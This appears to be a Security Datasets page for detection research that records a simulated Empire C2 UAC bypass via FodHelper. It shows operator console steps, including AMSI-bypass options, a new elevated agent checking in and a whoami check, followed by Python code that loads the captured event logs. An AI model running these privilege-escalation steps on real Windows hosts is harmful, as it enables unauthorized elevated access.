Invoke BypassUAC FodHelper

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/09/04

Modification Date

2020/09/04

Tactics

TA0004

Techniques

T1548.002

Tags

BypassUAC,Registry Modification,Windows Registry FodHelper

Dataset Description

This dataset represents adversaries elevating privileges (bypassing uac) by performing an registry modification for FodHelper.

Simulation Metadata

Tools

type

Name

Module

C2

Empire

bypassuac_fodhelper

Adversary View

(Empire: SP7B3U2X) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
KU86XWEL ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         5376   5/0.0    2020-09-04 07:07:17  http            
SP7B3U2X ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         1376   5/0.0    2020-09-04 07:12:15  http            

(Empire: agents) > interact SP7B3U2X
(Empire: SP7B3U2X) > 
(Empire: SP7B3U2X) > usemodule privesc/bypassuac_fodhelper
(Empire: powershell/privesc/bypassuac_fodhelper) > info

              Name: Invoke-FodHelperBypass
            Module: powershell/privesc/bypassuac_fodhelper
        NeedsAdmin: False
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: True
  OutputExtension: None

Authors:
  Petr Medonos

Description:
  Bypasses UAC by performing an registry modification for
  FodHelper (based
  onhttps://winscripting.blog/2017/05/12/first-entry-welcome-
  and-uac-bypass/)

Comments:
  https://winscripting.blog/2017/05/12/first-entry-welcome-
  and-uac-bypass/

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        SP7B3U2X                  Agent to run module on.                 
  Listener         True                                  Listener to use.                        
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/privesc/bypassuac_fodhelper) > set Listener http
(Empire: powershell/privesc/bypassuac_fodhelper) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked SP7B3U2X to run TASK_CMD_JOB
[*] Agent SP7B3U2X tasked with task ID 2
[*] Tasked agent SP7B3U2X to run module powershell/privesc/bypassuac_fodhelper
(Empire: powershell/privesc/bypassuac_fodhelper) > 
Job started: EHNK23

[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent F2X6GE4R checked in
[+] Initial agent F2X6GE4R from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to F2X6GE4R at 172.18.39.5

(Empire: powershell/privesc/bypassuac_fodhelper) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
KU86XWEL ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         5376   5/0.0    2020-09-04 07:07:17  http            
SP7B3U2X ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         1376   5/0.0    2020-09-04 07:30:33  http            
F2X6GE4R ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         3936   5/0.0    2020-09-04 07:30:34  http            


(Empire: agents) > interact F2X6GE4R
(Empire: F2X6GE4R) > shell whoami
[*] Tasked F2X6GE4R to run TASK_SHELL
[*] Agent F2X6GE4R tasked with task ID 1
(Empire: F2X6GE4R) > 
theshire\pgustavo
..Command execution

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/privilege_escalation/host/empire_uac_shellapi_fodhelper.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)